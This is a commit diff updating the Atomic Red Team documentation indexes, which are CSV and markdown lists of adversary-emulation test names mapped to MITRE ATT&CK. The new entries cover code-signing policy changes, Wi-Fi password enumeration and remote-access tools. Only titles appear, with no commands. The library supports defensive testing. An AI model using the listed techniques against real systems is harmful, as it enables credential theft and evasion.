Generated docs from job=generate-docs branch=master [ci skip]

2024-05-15 00:48:54 +00:00
parent 5f71a665e2
commit 9c842daeb3
37 changed files with 568 additions and 59 deletions
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1556-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1561-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)

 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
@@ -248,6 +248,7 @@ defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacki
 defense-evasion,T1562.012,Impair Defenses: Disable or Modify Linux Audit System,1,Delete all auditd rules using auditctl,33a29ab1-cabb-407f-9448-269041bf2856,sh
 defense-evasion,T1562.012,Impair Defenses: Disable or Modify Linux Audit System,2,Disable auditd using auditctl,7906f0a6-b527-46ee-9026-6e81a9184e08,sh
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
+defense-evasion,T1553.006,Subvert Trust Controls: Code Signing Policy Modification,1,Code Signing Policy Modification,bb6b51e1-ab92-45b5-aeea-e410d06405f8,command_prompt
 defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
@@ -319,6 +320,7 @@ defense-evasion,T1112,Modify Registry,67,Enable Proxy Settings,eb0ba433-63e5-4a8
 defense-evasion,T1112,Modify Registry,68,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
 defense-evasion,T1112,Modify Registry,69,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
 defense-evasion,T1112,Modify Registry,70,Enable RDP via Registry (fDenyTSConnections),16bdbe52-371c-4ccf-b708-79fba61f1db4,command_prompt
+defense-evasion,T1112,Modify Registry,71,Disable Windows Prefetch Through Registry,7979dd41-2045-48b2-a54e-b1bc2415c9da,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
@@ -1241,6 +1243,7 @@ command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,1
 command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
 command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
 command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
+command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -1714,6 +1717,7 @@ discovery,T1082,System Information Discovery,30,Check computer location,96be6002
 discovery,T1082,System Information Discovery,31,BIOS Information Discovery through Registry,f2f91612-d904-49d7-87c2-6c165d23bead,command_prompt
 discovery,T1082,System Information Discovery,32,ESXi - VM Discovery using ESXCLI,2040405c-eea6-4c1c-aef3-c2acc430fac9,command_prompt
 discovery,T1082,System Information Discovery,33,ESXi - Darkside system information discovery,f89812e5-67d1-4f49-86fa-cbc6609ea86a,command_prompt
+discovery,T1016.002,System Network Configuration Discovery: Wi-Fi Discovery,1,Enumerate Stored Wi-Fi Profiles And Passwords via netsh,53cf1903-0fa7-4177-ab14-f358ae809eec,command_prompt
 discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
 discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
 discovery,T1580,Cloud Infrastructure Discovery,2,AWS - EC2 Security Group Enumeration,99b38f24-5acc-4aa3-85e5-b7f97a5d37ac,command_prompt
@@ -1824,6 +1828,7 @@ discovery,T1018,Remote System Discovery,18,Enumerate Active Directory Computers
 discovery,T1018,Remote System Discovery,19,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
 discovery,T1018,Remote System Discovery,20,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1018,Remote System Discovery,21,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
+discovery,T1018,Remote System Discovery,22,Enumerate Remote Hosts with Netscan,b8147c9a-84db-4ec1-8eee-4e0da75f0de5,powershell
 discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
 discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
 discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
@@ -151,6 +151,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,24,Set a firewall rule using New-NetFirewallRule,94be7646-25f6-467e-af23-585fb13000c8,powershell
 defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
+defense-evasion,T1553.006,Subvert Trust Controls: Code Signing Policy Modification,1,Code Signing Policy Modification,bb6b51e1-ab92-45b5-aeea-e410d06405f8,command_prompt
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -221,6 +222,7 @@ defense-evasion,T1112,Modify Registry,67,Enable Proxy Settings,eb0ba433-63e5-4a8
 defense-evasion,T1112,Modify Registry,68,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
 defense-evasion,T1112,Modify Registry,69,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
 defense-evasion,T1112,Modify Registry,70,Enable RDP via Registry (fDenyTSConnections),16bdbe52-371c-4ccf-b708-79fba61f1db4,command_prompt
+defense-evasion,T1112,Modify Registry,71,Disable Windows Prefetch Through Registry,7979dd41-2045-48b2-a54e-b1bc2415c9da,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -829,6 +831,7 @@ command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,1
 command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
 command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
 command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
+command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -1136,6 +1139,7 @@ discovery,T1082,System Information Discovery,28,Driver Enumeration using DriverQ
 discovery,T1082,System Information Discovery,29,System Information Discovery,4060ee98-01ae-4c8e-8aad-af8300519cc7,command_prompt
 discovery,T1082,System Information Discovery,30,Check computer location,96be6002-9200-47db-94cb-c3e27de1cb36,command_prompt
 discovery,T1082,System Information Discovery,31,BIOS Information Discovery through Registry,f2f91612-d904-49d7-87c2-6c165d23bead,command_prompt
+discovery,T1016.002,System Network Configuration Discovery: Wi-Fi Discovery,1,Enumerate Stored Wi-Fi Profiles And Passwords via netsh,53cf1903-0fa7-4177-ab14-f358ae809eec,command_prompt
 discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
 discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
 discovery,T1217,Browser Bookmark Discovery,6,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
@@ -1208,6 +1212,7 @@ discovery,T1018,Remote System Discovery,18,Enumerate Active Directory Computers
 discovery,T1018,Remote System Discovery,19,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
 discovery,T1018,Remote System Discovery,20,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1018,Remote System Discovery,21,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
+discovery,T1018,Remote System Discovery,22,Enumerate Remote Hosts with Netscan,b8147c9a-84db-4ec1-8eee-4e0da75f0de5,powershell
 discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
 discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
 discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
@@ -318,7 +318,8 @@
  - Atomic Test #2: Disable auditd using auditctl [linux]
 - [T1207 Rogue Domain Controller](../../T1207/T1207.md)
  - Atomic Test #1: DCShadow (Active Directory) [windows]
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1553.006 Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md)
+  - Atomic Test #1: Code Signing Policy Modification [windows]
 - [T1610 Deploy a container](../../T1610/T1610.md)
  - Atomic Test #1: Deploy Docker container [containers]
 - [T1112 Modify Registry](../../T1112/T1112.md)
@@ -392,6 +393,7 @@
  - Atomic Test #68: Set-Up Proxy Server [windows]
  - Atomic Test #69: RDP Authentication Level Override [windows]
  - Atomic Test #70: Enable RDP via Registry (fDenyTSConnections) [windows]
+  - Atomic Test #71: Disable Windows Prefetch Through Registry [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
  - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1718,6 +1720,7 @@
  - Atomic Test #10: UltraVNC Execution [windows]
  - Atomic Test #11: MSP360 Connect Execution [windows]
  - Atomic Test #12: RustDesk Files Detected Test on Windows [windows]
+  - Atomic Test #13: Splashtop Execution [windows]
 - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1572 Protocol Tunneling](../../T1572/T1572.md)
@@ -2373,7 +2376,8 @@
  - Atomic Test #31: BIOS Information Discovery through Registry [windows]
  - Atomic Test #32: ESXi - VM Discovery using ESXCLI [linux]
  - Atomic Test #33: ESXi - Darkside system information discovery [linux]
- T1016.002 Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1016.002 System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md)
+  - Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh [windows]
 - [T1010 Application Window Discovery](../../T1010/T1010.md)
  - Atomic Test #1: List Process Main Windows - C# .NET [windows]
 - T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2508,6 +2512,7 @@
  - Atomic Test #19: Get-DomainController with PowerView [windows]
  - Atomic Test #20: Get-WmiObject to Enumerate Domain Controllers [windows]
  - Atomic Test #21: Remote System Discovery - net group Domain Controller [windows]
+  - Atomic Test #22: Enumerate Remote Hosts with Netscan [windows]
 - [T1046 Network Service Discovery](../../T1046/T1046.md)
  - Atomic Test #1: Port Scan [linux, macos]
  - Atomic Test #2: Port Scan Nmap [linux, macos]
@@ -656,7 +656,7 @@
  - Atomic Test #26: FreeBSD List Kernel Modules [linux]
  - Atomic Test #32: ESXi - VM Discovery using ESXCLI [linux]
  - Atomic Test #33: ESXi - Darkside system information discovery [linux]
- T1016.002 Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
@@ -82,7 +82,7 @@
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.004 Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1218.015 Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.006 Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
  - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
  - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
@@ -526,7 +526,7 @@
  - Atomic Test #8: Hostname Discovery [linux, macos]
  - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
  - Atomic Test #13: Show System Integrity Protection status (MacOS) [macos]
- T1016.002 Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
@@ -208,7 +208,8 @@
 - T1218.015 Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1207 Rogue Domain Controller](../../T1207/T1207.md)
  - Atomic Test #1: DCShadow (Active Directory) [windows]
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1553.006 Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md)
+  - Atomic Test #1: Code Signing Policy Modification [windows]
 - [T1112 Modify Registry](../../T1112/T1112.md)
  - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
  - Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
@@ -280,6 +281,7 @@
  - Atomic Test #68: Set-Up Proxy Server [windows]
  - Atomic Test #69: RDP Authentication Level Override [windows]
  - Atomic Test #70: Enable RDP via Registry (fDenyTSConnections) [windows]
+  - Atomic Test #71: Disable Windows Prefetch Through Registry [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
  - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1182,6 +1184,7 @@
  - Atomic Test #10: UltraVNC Execution [windows]
  - Atomic Test #11: MSP360 Connect Execution [windows]
  - Atomic Test #12: RustDesk Files Detected Test on Windows [windows]
+  - Atomic Test #13: Splashtop Execution [windows]
 - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1572 Protocol Tunneling](../../T1572/T1572.md)
@@ -1644,7 +1647,8 @@
  - Atomic Test #29: System Information Discovery [windows]
  - Atomic Test #30: Check computer location [windows]
  - Atomic Test #31: BIOS Information Discovery through Registry [windows]
- T1016.002 Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1016.002 System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md)
+  - Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh [windows]
 - [T1010 Application Window Discovery](../../T1010/T1010.md)
  - Atomic Test #1: List Process Main Windows - C# .NET [windows]
 - T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1737,6 +1741,7 @@
  - Atomic Test #19: Get-DomainController with PowerView [windows]
  - Atomic Test #20: Get-WmiObject to Enumerate Domain Controllers [windows]
  - Atomic Test #21: Remote System Discovery - net group Domain Controller [windows]
+  - Atomic Test #22: Enumerate Remote Hosts with Netscan [windows]
 - [T1046 Network Service Discovery](../../T1046/T1046.md)
  - Atomic Test #3: Port Scan NMap for Windows [windows]
  - Atomic Test #4: Port Scan using python [windows]
@@ -14,7 +14,7 @@
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) |  | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
@@ -14,7 +14,7 @@
